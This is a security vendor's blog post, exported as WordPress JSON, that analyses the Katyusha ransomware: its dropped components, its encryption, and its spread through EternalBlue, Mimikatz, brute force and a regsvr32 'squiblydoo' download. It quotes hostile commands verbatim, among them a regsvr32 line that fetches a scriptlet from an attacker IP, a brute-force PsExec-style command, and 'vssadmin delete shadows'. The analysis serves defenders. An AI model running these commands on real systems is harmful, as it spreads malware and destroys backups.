{"id":87098,"date":"2018-12-14T16:29:58","date_gmt":"2018-12-14T10:59:58","guid":{"rendered":"https:\/\/blogs_admin.quickheal.com\/?p=87098"},"modified":"2018-12-14T17:47:57","modified_gmt":"2018-12-14T12:17:57","slug":"sophisticated-ransomware-katyusha","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/sophisticated-ransomware-katyusha\/","title":{"rendered":"Sophisticated Ransomware: \u201cKatyusha\u201d"},"content":{"rendered":"<p>For several months, Quick Heal Security Labs has been observing an increase in ransomware. We have found one more interesting ransomware which encrypts files, adds the extension \u201c.katyusha\u201d, demands 0.5 btc within three days and threatens to release the data for public download if the ransom is not paid. The malware is bundled with many components, including the \u201c<strong><b>Double pulsar<\/b><\/strong>\u201d and \u201c<strong><b>Eternal blue<\/b><\/strong>\u201d exploits, which are used to spread over the network. It also uses a unique attack technique called \u201c<strong><b>squiblydoo<\/b><\/strong>\u201d to spread over the network. The infection vector for this ransomware is still not confirmed, but on the basis of attribution this ransomware may enter the system via spear phishing, malvertising, spam mail, SMB exploit, etc.<\/p>\n<p><strong><b>Technical Analysis<\/b><\/strong>:<\/p>\n<p>This malware is packed with MPRESS (v2.19) and is present on the victim\u2019s system with the name \u201c<strong><b>katyusha.exe<\/b><\/strong>\u201d at \u201c%temp%\u201d. It contains three components. 
On execution it drops them into C:\\Windows\\Temp and starts their execution:<\/p>\n<ul>\n<li>Svchost0.bat<\/li>\n<li>Zkts.exe<\/li>\n<li>Ktsi.exe<\/li>\n<\/ul>\n<p>Katyusha checks for the following files on the system to determine whether the system is already infected or not.<\/p>\n<p style=\"text-align: center\"><strong><b>\u201cC:\\_how_to_decrypt_you_files.txt\u201d<\/b><\/strong><\/p>\n<p style=\"text-align: center\"><strong><b>\u201cC:\\ProgramData\\_how_to_decrypt_you_files.txt\u201d<\/b><\/strong><\/p>\n<p>If the system is already infected, Katyusha creates a batch file (svchost0.bat) containing the code shown in Fig. 1, which deletes the self-copy and terminates the malware. If the system is not infected, it drops zkts.exe and ktsi.exe and executes them.<\/p>\n<figure id=\"attachment_87099\" aria-describedby=\"caption-attachment-87099\" style=\"width: 608px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87099\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig1-svchost_batchfile.png\" alt=\"\" width=\"608\" height=\"100\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig1-svchost_batchfile.png 608w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig1-svchost_batchfile-300x49.png 300w\" sizes=\"(max-width: 608px) 100vw, 608px\" \/><figcaption id=\"caption-attachment-87099\" class=\"wp-caption-text\">Fig 1: Content of Svchost0.bat<\/figcaption><\/figure>\n<p><strong><b>Zkts.exe<\/b><\/strong>:<\/p>\n<p>This file is a 7zip-compressed executable and the main component; it contains multiple sub-modules such as the network spreading module, the password stealing module, etc.<\/p>\n<p>On execution, zkts.exe extracts components into \u201c<strong><b>C:\\Windows\\Temp<\/b><\/strong>\u201d such as Mimikatz, katyusha.dll, the eternal blue exploit, etc. 
These are later used by Katyusha to perform its activities.<\/p>\n<figure id=\"attachment_87101\" aria-describedby=\"caption-attachment-87101\" style=\"width: 1101px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87101\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1.png\" alt=\"\" width=\"1101\" height=\"332\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1.png 1101w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1-300x90.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1-768x232.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1-650x196.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig2-zkts_dropped_files-1-789x238.png 789w\" sizes=\"(max-width: 1101px) 100vw, 1101px\" \/><figcaption id=\"caption-attachment-87101\" class=\"wp-caption-text\">Fig 2: Files dropped by zkts.exe<\/figcaption><\/figure>\n<p><strong><b>Ktsi.exe<\/b><\/strong> (Encryptor):<\/p>\n<p>This is another main component, which is also an MPRESS-packed file. It is mainly used for file encryption and to drop the ransom note on the victim\u2019s system. 
This process is started independently by the main payload (katyusha.exe), as shown in Fig 3.<\/p>\n<figure id=\"attachment_87102\" aria-describedby=\"caption-attachment-87102\" style=\"width: 685px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87102\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig3-createProcess_KTSI.png\" alt=\"\" width=\"685\" height=\"158\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig3-createProcess_KTSI.png 685w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig3-createProcess_KTSI-300x69.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig3-createProcess_KTSI-650x150.png 650w\" sizes=\"(max-width: 685px) 100vw, 685px\" \/><figcaption id=\"caption-attachment-87102\" class=\"wp-caption-text\">Fig 3: Call to CreateProcess() for ktsi.exe<\/figcaption><\/figure>\n<p>On execution, ktsi.exe first kills the tasks listed below, so that the handles on files that those processes keep locked (such as database files) are released and the files can be encrypted, as shown in Fig 4.<\/p>\n<p>To encrypt database-related files successfully, ktsi kills the processes that belong to database applications. 
Below is the list of processes hard-coded in the malware:<\/p>\n<table width=\"391\">\n<tbody>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">mysqld.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">httpd.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\">sqlsevr.exe<\/td>\n<\/tr>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">sqlwriter.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">w3wp.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\">sqlagent.exe<\/td>\n<\/tr>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">fdhost.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">fdlauncher.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\">reportingservicesservice.exe<\/td>\n<\/tr>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">omtsreco.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">tnslsnr.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\">oracle.exe<\/td>\n<\/tr>\n<tr>\n<td style=\"font-weight: 400\" width=\"92\">emagent.exe<\/td>\n<td style=\"font-weight: 400\" width=\"105\">mysqld-nt.exe<\/td>\n<td style=\"font-weight: 400\" width=\"194\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<div><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87103\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy.png\" alt=\"\" width=\"1060\" height=\"251\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy.png 1060w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy-300x71.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy-768x182.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy-650x154.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig4-taskkill-Copy-789x187.png 789w\" 
sizes=\"(max-width: 1060px) 100vw, 1060px\" \/><\/div>\n<p>Fig 4: Taskkill command execution.<\/p>\n<p>After the taskkill operation, the malware drops the ransom note in html and txt format at the path below, so that it is shown to all users at system startup,<\/p>\n<p>\u201cC:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\u201d<\/p>\n<p style=\"text-align: center\">_how_to_decrypt_you_files.txt<\/p>\n<p style=\"text-align: center\">_how_to_decrypt_you_files.html<\/p>\n<p>In \u201cC:\\ProgramData\u201d and at the root of the C drive (C:\\) it drops only the text ransom note, &#8220;_how_to_decrypt_you_files.txt&#8221;.<\/p>\n<figure id=\"attachment_87115\" aria-describedby=\"caption-attachment-87115\" style=\"width: 852px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87115\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote-.png\" alt=\"\" width=\"852\" height=\"551\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote-.png 852w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote--300x194.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote--768x497.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote--603x390.png 603w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig5_1-ransomnote--789x510.png 789w\" sizes=\"(max-width: 852px) 100vw, 852px\" \/><figcaption id=\"caption-attachment-87115\" class=\"wp-caption-text\">Fig 5: Ransom Note<\/figcaption><\/figure>\n<p>Ktsi.exe also deletes shadow copies by executing the following command,<\/p>\n<p style=\"text-align: center\">\u201cvssadmin delete shadows \/all \/quiet\u201d<\/p>\n<figure id=\"attachment_87129\" aria-describedby=\"caption-attachment-87129\" style=\"width: 1023px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" 
class=\"size-full wp-image-87129\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1.png\" alt=\"\" width=\"1023\" height=\"42\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1.png 1023w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1-300x12.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1-768x32.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1-650x27.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig6-vssadmin-modi-1-789x32.png 789w\" sizes=\"(max-width: 1023px) 100vw, 1023px\" \/><figcaption id=\"caption-attachment-87129\" class=\"wp-caption-text\">Fig 6: Deleting shadow copies<\/figcaption><\/figure>\n<p>After all these tasks, ktsi.exe starts file encryption (RSA) with the help of the standard encryption routines of <a href=\"https:\/\/wiki.openssl.org\/index.php\/Cryptogams_AES\"><u>CRYPTOGAMS<\/u><\/a>. 
Signatures related to this algorithm are found in the file, as shown in Fig 7.<\/p>\n<figure id=\"attachment_87106\" aria-describedby=\"caption-attachment-87106\" style=\"width: 604px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87106\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig7-cryptgams.png\" alt=\"\" width=\"604\" height=\"113\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig7-cryptgams.png 604w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig7-cryptgams-300x56.png 300w\" sizes=\"(max-width: 604px) 100vw, 604px\" \/><figcaption id=\"caption-attachment-87106\" class=\"wp-caption-text\">Fig 7: Cryptogams strings.<\/figcaption><\/figure>\n<p>It encrypts files of all extensions except the following ones,<\/p>\n<figure id=\"attachment_87107\" aria-describedby=\"caption-attachment-87107\" style=\"width: 437px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87107\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig8-extensions.png\" alt=\"\" width=\"437\" height=\"14\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig8-extensions.png 437w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig8-extensions-300x10.png 300w\" sizes=\"(max-width: 437px) 100vw, 437px\" \/><figcaption id=\"caption-attachment-87107\" class=\"wp-caption-text\">Fig 8: Extensions excluded from encryption.<\/figcaption><\/figure>\n<p>It also contains an exclusion list of files and folders (as shown in Fig 9); if any of these words is found in an enumerated file path, that path is excluded from encryption. 
So that encryption can proceed uninterrupted, the list also contains the names of a few security products.<\/p>\n<figure id=\"attachment_87108\" aria-describedby=\"caption-attachment-87108\" style=\"width: 770px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87108\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders.png\" alt=\"\" width=\"770\" height=\"478\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders.png 770w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders-300x186.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders-768x477.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig9-exclusionlist-folders-628x390.png 628w\" sizes=\"(max-width: 770px) 100vw, 770px\" \/><figcaption id=\"caption-attachment-87108\" class=\"wp-caption-text\">Fig 9: Exclusion list of files and folders.<\/figcaption><\/figure>\n<p><strong><b>Spreading Mechanism:<\/b><\/strong><\/p>\n<p>For network spreading, the files extracted by zkts.exe come into play. 
Please refer to Fig 2 for the extracted components.<\/p>\n<p>m32.exe and m64.exe are the Mimikatz tool, which is used to fetch credentials from the Windows lsass.exe process.<\/p>\n<p>First, katyusha.exe determines whether the system is 64-bit or 32-bit using the system call IsWow64Process (it returns a nonzero value if the system is 64-bit) and executes Mimikatz according to the system architecture.<\/p>\n<p>The Mimikatz tool drops the following files at <strong><b>\u201cC:\\Windows\\Temp\u201d<\/b><\/strong> as output.<\/p>\n<p>&#8211; snamelog: contains the fetched usernames.<\/p>\n<p>&#8211; spasslog: contains the passwords for the respective fetched usernames.<\/p>\n<figure id=\"attachment_87109\" aria-describedby=\"caption-attachment-87109\" style=\"width: 723px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87109\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig10-identify_system_32bit_64bit.png\" alt=\"\" width=\"723\" height=\"157\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig10-identify_system_32bit_64bit.png 723w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig10-identify_system_32bit_64bit-300x65.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig10-identify_system_32bit_64bit-650x141.png 650w\" sizes=\"(max-width: 723px) 100vw, 723px\" \/><figcaption id=\"caption-attachment-87109\" class=\"wp-caption-text\">Fig 10: Check to determine system type and start Mimikatz.<\/figcaption><\/figure>\n<p>After Mimikatz has run, katyusha.exe reads the usernames from snamelog and the passwords from spasslog, which are then used to perform a brute force attack across the network.<\/p>\n<p>Zkts.exe also drops svchostb.exe, svchostb.xml, svchostbs.exe, svchostbs.xml, katyusha.dll and svchostp.exe. 
These components are used to spread Katyusha over the network.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-87145\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/process_list.png\" alt=\"\" width=\"502\" height=\"128\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/process_list.png 502w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/process_list-300x76.png 300w\" sizes=\"(max-width: 502px) 100vw, 502px\" \/><\/p>\n<p>With the help of the dropped eternal blue exploit and double pulsar, the malware executes katyusha.dll on the systems connected to the network, one after another. For this, katyusha.exe exploits the SMB vulnerability with the help of the following command,<\/p>\n<p>\u201cC:\\windows\\temp\\&amp;svchostb.exe &#8211;TargetIp &lt;ip_address&gt; &amp; svchostbs.exe &#8211;OutConfig s &#8211;TargetPort 445 &#8211;Protocol SMB &#8211;Architecture x64 &#8211;Function RunDLL &#8211;DllPayload katyusha.dll &#8211;TargetIp &lt;ip_address&gt;\u201d<\/p>\n<figure id=\"attachment_87117\" aria-describedby=\"caption-attachment-87117\" style=\"width: 1439px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87117\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue.png\" alt=\"\" width=\"1439\" height=\"390\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue.png 1439w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue-300x81.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue-768x208.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue-650x176.png 650w, 
https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig11_1-cmd-procmon-eternal-blue-789x214.png 789w\" sizes=\"(max-width: 1439px) 100vw, 1439px\" \/><figcaption id=\"caption-attachment-87117\" class=\"wp-caption-text\">Fig 11: Execution of the exploit on each system in the network.<\/figcaption><\/figure>\n<p>Katyusha.dll is the payload file; it contains code to execute the following command,<\/p>\n<p>\u201cregsvr32 \/u \/s \/i:hxxp:\/\/86.106.102.147\/img\/katyusha.data scrobj.dll\u201d<\/p>\n<p>The hard-coded command string can also be found in the file, as shown in Fig 12.<\/p>\n<figure id=\"attachment_87111\" aria-describedby=\"caption-attachment-87111\" style=\"width: 656px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87111\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig12.png\" alt=\"\" width=\"656\" height=\"53\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig12.png 656w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig12-300x24.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig12-650x53.png 650w\" sizes=\"(max-width: 656px) 100vw, 656px\" \/><figcaption id=\"caption-attachment-87111\" class=\"wp-caption-text\">Fig 12: Command to download and execute the script from the Url<\/figcaption><\/figure>\n<p>On execution of the above regsvr32 (Microsoft Register Server) command, it downloads the script (katyusha.data) from the given Url and, through the unregister parameter of regsvr32 (\/u), executes the javascript code under the &lt;registration&gt; tag of the downloaded scriptlet, as shown in Fig 13. 
The script contains code to download katyusha.exe from the given Url into the <strong><b>\u201c%temp%\u201d<\/b><\/strong> directory and execute it.<\/p>\n<figure id=\"attachment_87112\" aria-describedby=\"caption-attachment-87112\" style=\"width: 1021px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87112\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy.png\" alt=\"\" width=\"1021\" height=\"620\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy.png 1021w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy-300x182.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy-768x466.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy-642x390.png 642w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig13_2-katyusha.data-Copy-789x479.png 789w\" sizes=\"(max-width: 1021px) 100vw, 1021px\" \/><figcaption id=\"caption-attachment-87112\" class=\"wp-caption-text\">Fig 13: Content of the katyusha.data script<\/figcaption><\/figure>\n<figure id=\"attachment_87113\" aria-describedby=\"caption-attachment-87113\" style=\"width: 839px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-87113\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_.png\" alt=\"\" width=\"839\" height=\"76\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_.png 839w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_-300x27.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_-768x70.png 768w, 
https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_-650x59.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig14_1-pcap-katysha.data_-789x71.png 789w\" sizes=\"(max-width: 839px) 100vw, 839px\" \/><figcaption id=\"caption-attachment-87113\" class=\"wp-caption-text\">Fig 14: Download requests for the script and payload from an infected system.<\/figcaption><\/figure>\n<p>Such an attack, in which regsvr32 is used to download a scriptlet from the C&amp;C server and execute it, is referred to as <strong><b>\u201csquiblydoo\u201d<\/b><\/strong>.<\/p>\n<p>After the above action, it also brute forces systems in the network with the help of the Power Admin tool (svchostp.exe). This tool is similar to the Sysinternals <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/psexec\"><u>PsExec<\/u><\/a> tool and is used to execute processes on a remote system. The ransomware itself carries the short list of usernames and passwords given below; along with these, it also uses the usernames and passwords fetched by Mimikatz (snamelog and spasslog) for the brute force attack.<\/p>\n<p><strong>Usernames:<\/strong><\/p>\n<p>Admin, administrator, +content of snamelog.<\/p>\n<p><strong>Passwords:<\/strong><\/p>\n<p>admin, 12345, chinachina203, 111, 123456, qwerty, test, abc123, 12345678, 0000, 1122, 1234, +contents of spasslog.<\/p>\n<p>For brute forcing, katyusha uses the following command,<\/p>\n<p>\u201cC:\\Windows\\temp\\svchostp.exe &lt;ip_address&gt; -u &lt;username&gt; -p &lt;password&gt; -n 10 -s regsvr32 \/u \/s \/i:https:\/\/86.106.102.147\/img\/katyusha.data scrobj.dll\u201d<\/p>\n<p>The above command simply executes the regsvr32 utility with the url as a parameter to download the payload, and then performs the activity explained above for katyusha.dll.<\/p>\n<figure id=\"attachment_87114\" aria-describedby=\"caption-attachment-87114\" style=\"width: 1119px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full 
wp-image-87114\" src=\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy.png\" alt=\"\" width=\"1119\" height=\"357\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy.png 1119w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy-300x96.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy-768x245.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy-650x207.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2018\/12\/fig15-power-admin-brute-force-Copy-789x252.png 789w\" sizes=\"(max-width: 1119px) 100vw, 1119px\" \/><figcaption id=\"caption-attachment-87114\" class=\"wp-caption-text\">Fig 15: Use of the Power Admin tool (svchostp.exe)<\/figcaption><\/figure>\n<p><strong><b>IOC<\/b><\/strong>:<\/p>\n<p><strong>MD5: <\/strong>7f87db33980c0099739de40d1b725500<\/p>\n<p><strong>Urls:<\/strong><\/p>\n<ol>\n<li>hxxp:\/\/86.106.102.147\/img\/katyusha.data<\/li>\n<li>hxxp:\/\/86.106.102.147\/img\/katyusha.exe<\/li>\n<\/ol>\n<p><strong>Bitcoin Wallet Address:<\/strong> \u201c3ALmvAWLEothnMF5BjckAFaKB5S6zan9PK\u201d<\/p>\n<p><strong><b>Conclusion<\/b><\/strong>:<\/p>\n<p>This year we have seen a spike in the number of ransomware families, and they are using new ways both to spread and to encrypt data. Now most ransomware is bundled with exploits and tools such as eternal blue and mimikatz for spreading over the network. 
We advise users to avoid accessing suspicious Urls and emails, to use strong system credentials and to keep their antivirus up to date.<\/p>\n<p><strong>Subject Matter Expert:<\/strong><\/p>\n<p>Pratik Pachpor | Quick Heal Security Labs<\/p>\n","protected":false},"excerpt":{"rendered":"<p>For several months, Quick Heal Security Labs has been observing an increase in ransomware. We have found one more interesting ransomware which encrypts files, adds the extension \u201c.katyusha\u201d, demands 0.5 btc within three days and threatens to release the data for public download if the ransom is not paid. The malware is bundled with [&hellip;]<\/p>\n","protected":false},"author":51,"featured_media":87121,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[164,133,24,151,303,910,5,36,293,1395],"tags":[719,1634,1450,1631,1632,50,1633,40,38],"class_list":["post-87098","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-crime","category-hacker","category-malware","category-password","category-phishing","category-ransomware","category-security","category-security-patch","category-spam","category-vulnerability","tag-bitcoin","tag-double-pulsar","tag-eternalblue","tag-katyusha","tag-mimikatz","tag-ransomware","tag-squiblydoo","tag-trojan","tag-vulnerability"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87098"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/51"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=87098"}],"version-history":[{"count":28,"href":"https:\/\/www.quickheal.com\/blogs\/wp-jso
n\/wp\/v2\/posts\/87098\/revisions"}],"predecessor-version":[{"id":87182,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87098\/revisions\/87182"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/87121"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=87098"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=87098"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=87098"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}